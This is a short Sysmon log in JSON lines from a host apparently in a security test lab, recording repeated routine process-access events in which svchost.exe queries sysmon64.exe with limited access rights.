{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1538,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1539,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1540,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1541,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1542,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1543,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1544,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1545,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
